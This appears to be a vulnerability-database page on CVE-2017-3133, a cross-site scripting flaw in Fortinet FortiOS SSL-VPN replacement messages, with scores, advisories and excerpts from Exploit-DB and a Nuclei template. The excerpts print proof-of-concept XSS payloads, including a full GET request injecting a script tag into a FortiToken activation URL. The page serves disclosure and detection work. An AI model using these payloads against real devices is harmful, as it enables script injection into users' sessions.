CVE-2017-3133
published 2017-09-12CVE-2017-3133: A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the…
PriorityP344medium6.1CVSS 3.0
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
8.87%
94.6th percentile
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortinet | — | — |
| fortinet | fortios | <= 5.6.0 | — |
| fortinet | fortios | — | — |
| fortinet | fortitoken | — | — |
| fortinet | fortiview | — | — |
| fortinet_inc | fortinet_fortios | — | — |
CVSS provenance
nvdv3.06.1MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mcpm-3f4m-4gc6: A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5
ghsa_unreviewed·2022-05-17
CVE-2017-3133 [MEDIUM] CWE-79 GHSA-mcpm-3f4m-4gc6: A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN.
Fortinet
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.4.0 through 5.4.4 and 5.6.0 allows attackers to exec...
vendor_fortinet·2017-09-12·CVSS 6.1
CVE-2017-3131 [MEDIUM] CWE-79 A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.4.0 through 5.4.4 and 5.6.0 allows attackers to exec...
FG-IR-17-104: A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.4.0 through 5.4.4 and 5.6.0 allows attackers to exec...
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.4.0 through 5.4.4 and 5.6.0 allows attackers to execute unauthorized code or commands via the filter input in "Applications" under FortiView.
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken.
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN.
CVEs: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133
CWEs: CW
No detection rules found.
Exploit-DB
Fortinet FortiOS < 5.6.0 - Cross-Site Scripting
exploitdb·2017-07-28·CVSS 5.4
CVE-2017-3133 [MEDIUM] Fortinet FortiOS < 5.6.0 - Cross-Site Scripting
Fortinet FortiOS 15832" onmouseover=alert('XSS') x="y
(...)
2. XSS in WEB UI - Assign Token:
URL:
https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E
Http request:
GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhd
Nuclei
Fortinet FortiOS < 5.6.0 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2017-3133 [MEDIUM] Fortinet FortiOS < 5.6.0 - Cross-Site Scripting
Fortinet FortiOS alert(document.domain)"
- type: word
part: header_3
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
part: header
name: csrf
group: 2
regex:
- 'ccsrftoken_([0-9_a-z]+)="([A-Z0-9]+)";'
internal: true
# digest: 4a0a00473045022100c93edab04a98dd74d7394a7c892f69ff6ccb77d4d39e0cdf6dcb192d60b5408a02203dfd920e73befcc6f5009c115984342927df5d5724dcbfa5861e7877d7eb6eda:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://www.securityfocus.com/bid/100009http://www.securitytracker.com/id/1039020https://fortiguard.com/advisory/FG-IR-17-104https://www.exploit-db.com/exploits/42388/http://www.securityfocus.com/bid/100009http://www.securitytracker.com/id/1039020https://fortiguard.com/advisory/FG-IR-17-104https://www.exploit-db.com/exploits/42388/
2017-09-12
Published